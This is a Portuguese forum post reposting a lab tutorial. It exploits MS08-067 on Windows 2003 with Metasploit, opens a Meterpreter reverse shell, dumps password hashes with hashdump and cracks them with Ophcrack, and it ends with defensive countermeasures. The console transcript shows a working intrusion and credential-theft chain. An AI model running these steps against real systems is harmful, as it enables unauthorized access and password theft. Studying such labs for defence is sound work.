Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Proteção contra Windows password cracking com Meterpreter hashdump e o Ophcrack

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Proteção contra Windows password cracking com Meterpreter hashdump e o Ophcrack

    Proteção contra Windows password cracking com Meterpreter hashdump e o Ophcrack



    Quando o assunto é Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... o Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... é sem sombra de dúvidas o estado da arte. Como ele é executado na memória da vitima acaba se tornando um alvo de dificil detecção por antivírus e IPSs.

    Ele é recheado de comandos que permitem diversas ações desde visualização das informações até controle do microfone e webcam do alvo.

    Neste láb. irei usar o hashdump para obter o dump de senhas e farei um password brute force usando o Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... O Ophcrack é um password cracker multiplataforma livre baseado em Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... para quebra de senha de sistemas Windows.

    Existem Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... no site da ferramenta, porém as tables especiais são encontradas no lado negro da força.


    Vamos aos testes

    Iniciando um conexão com o Meterpreter e obtendo o dump de senhas

    msf exploit(ms08_067_netapi) > exploit
    [*] Started reverse handler on 11.11.11.11:4444[*] Automatically detecting the target…[*] Fingerprint: Windows 2003 – No Service Pack – lang:Unknown[*] Selected Target: Windows 2003 SP0 Universal[*] Attempting to trigger the vulnerability…[*] Sending stage (749056 bytes) to 11.11.11.11[*] Meterpreter session 1 opened (11.11.11.11:4444 -> 11.11.11.11:1031) at Mon Mar 28 20:41:25 -0300 2011
    meterpreter > hashdump

    Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d :e19ccf75ee54e06b06a5907af13cef42:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe 0d16ae931b73c59d7e0c089c0:::
    SUPPORT_388945a0?:1001:aad3b435b51404eeaad3b435b51 404ee:9ccce0e593125118ac7357e105e50589:::
    Com o hash em mãos é hora do Ophcrack fazer o trabalho sujo!








    Como vocês podem ver o Ophcrack levou cerca de 11 min para quebrar está senha relativamente fácil.

    Contramedidas

    Use as seguintes medidas preventivas contra este tipo de ataque:

    1 – Use senhas complexas;

    2 – Não use somente um tipo de autenticação. Além de algo que você sabe é interessante usar algo que você tem ( e.g. token, biometria );

    3 – Mantenha seu sistema atualizado;

    4 – Mantenha o firewall local ativado;

    5 – Use sistemas de proteção robustos e com checagem em tempo real da memória;

    6 – Se você não está afim de gastar ( item 5 ) então utilize o MSE ( Microsoft Security Essentials ) juntamente com um firewall pessoal.

    Mais informações:

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Fonte: Blog Alexos
    Last edited by V3nom; 20-02-2013, 12:39.
    Não Acha Estranha Essa Frase:
    Eu Sou Hacker e Uso Windows XP!

    Use Débian, Aprenda Slackware e Brinque Muito Com Back|Track


    Fã ->Nickguitar.dll


    Quer ajudar nossso fórum e não sabe como?
    Então click na imagem e ajude-nos com os links off
X
Working...
X